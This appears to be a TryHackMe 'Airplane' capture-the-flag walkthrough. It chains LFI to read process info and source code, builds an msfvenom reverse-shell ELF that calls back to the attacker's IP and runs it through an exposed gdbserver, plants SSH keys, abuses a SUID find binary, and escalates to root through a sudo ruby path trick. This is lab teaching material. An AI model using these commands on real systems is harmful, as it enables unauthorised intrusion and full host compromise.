Airplane

Are you ready to fly?

LogoAirplaneTryHackMe

Recon

Rustscan

Firstly, I initiated a Rustscan on the host, detecting three open ports: 22, 8000, and 6048.

rustscan --ulimit 5000 --range 1-65535 -a machine_ip
Rustscan Result

We've identified an SSH service running OpenSSH 8.2p1, an HTTP service on port 8000 running Werkzeug/3.0.2 Python/3.8.10, and an unidentified service on port 6048 with an unknown version. let's have a look at the http service

Picture of http port 8000 service

As you can see, I can't access the web app because it's redirecting me to airplane.thm. To gain access to the website, we need to add the domain to the /etc/hosts file. sudo echo "machine_ip airplane.thm" >> /etc/hosts After executing this command, let's observe how the website appears now.

Picture of http port 8000 service

Intial access

Excellent! We have the website running. Next, we see a parameter called 'page'. That could be indicative of a potential LFI attack on the 'page' parameter. Let's test it using Jhaddix's LFI wordlist.

ffuf command to exploit LFI

Notice that we have plenty of payloads. Let's test if they're working!

exploit LFI

Great! The exploit worked, and we can see that there are two users.

  • carlos

  • hudson

Shell as Hudson

Let's examine the processes running on the website using Burp Suite Repeater.

Burp Suite LFI ATTACK viewing /proc/self/environ

as you can see we get the environment of the website process and it's running by hudson user also we can view how the process has ran and view the command-line arguments

viewing the command-line arguments of the website process

as you can see we manged to get 2 information to start an attack the owner of the website is: hudson and the name of the file is app.py let's try to get the source code by returning one back step only:

getting source code of the website

Hooray!! we got the website source code: 

from flask import Flask, send_file, redirect, render_template, request
import os.path

app = Flask(__name__)


@app.route('/')
def index():
    if 'page' in request.args:
        page = 'static/' + request.args.get('page')

        if os.path.isfile(page):
            resp = send_file(page)
            resp.direct_passthrough = False

            if os.path.getsize(page) == 0:
                resp.headers["Content-Length"]=str(len(resp.get_data()))

            return resp
        
        else:
            return "Page not found"

    else:
        return redirect('http://airplane.thm:8000/?page=index.html', code=302)    


@app.route('/airplane')
def airplane():
    return render_template('airplane.html')


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8000)

great now that we gatherd all this info let's try to get info of the port 6048 by Fuzzing all machine's Processes via Burp Suite interuder

setting the vaule of the Fuzzing place

Next Set the number for Processes from 0 to 1000

Picture of Payload Setting Burp Suite

After searching through all processes, I found this particular process with the following command-line arguments:

Burp Suite picture of gdb process

Great! We've identified the unknown port as a gdb server. We can exploit it by creating an ELF backdoor with msfvenom, uploading it, and executing it easily. First, let's create the backdoor.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=your_tun0_ip LPORT=1337 PrependFork=true -f elf -o binary.elf

For a quicker method to obtain the OpenVPN IP, you can utilize this command: ifconfig tun0 | grep -i "inet" -w | awk '{print $2}' Next, after creating the backdoor, we need to set executable permissions on the file to ensure it runs correctly. 

chmod +x binary.elf

Afterward, we'll execute GDB to establish the remote connection.

gdb binary.elf

Next, we'll need to configure the remote debugger target so that the backdoor can be executed remotely.

target extended-remote airplane.thm:6048

Afterwards, upload the ELF file.

remote put binary.elf /tmp/binary.elf

Finally, set the remote executable file.

set remote exec-file /tmp/binary.elf

before runing the debugger Ensure to set up a netcat listener on the backdoor's port 

nc -lnvp 1337

Finally, simply run the debugger.

run

Woo-hoo! We've got a reverse shell! Let's goooo!

reverse shell via gdb remote service

Now that we have a reverse shell, let's level up the shell using the SSH service. Copy the ~/.ssh/id_rsa.pub from your computer, then run this command to paste the .ssh/id_rsa.pub into ~/.ssh/authorized_keys of huson. 

echo 'public_key_here' > ~/.ssh/authorized_keys

Cool! Now we're connected via SSH, so much better than before!

ssh connecting successfully

Shell as carlos

First things first, let's run linpeas.sh to check for any potential privilege escalation vulnerabilities.

linpase banner

Awesome! We discovered that the 'find' command has suid permissions.

suid find command

let's exploit it using this command: 

find . -exec /bin/bash -p \; -quit

Great! We've got a shell as carlos.

shell as carlos

Shell as root

Let's replicate what we did earlier to enhance our current shell.

echo 'public_key_here' > /home/carlos/.ssh/authorized_keys
chmod 600 authorized_keys

When running the 'id' command, it indicates that I'm in the sudo group.

carlos's groups

Let's attempt running the command 'sudo -l' to see if I'm permitted to execute commands as other users.

sudo -l command

Fantastic! As you can see, we have the ability to run Ruby scripts as root. Now, we can exploit this vulnerability easily in just one line. but how ??? By exploiting the wildcard to alter the path of the Ruby script, we can execute malicious commands.

echo "system('/bin/bash')" > /tmp/exp.rb; sudo /usr/bin/ruby /root/../tmp/exp.rb
root shell (;

now we can get the last flag easliy

root.txt

PreviousAbout meNextmKingdom

Last updated

Was this helpful?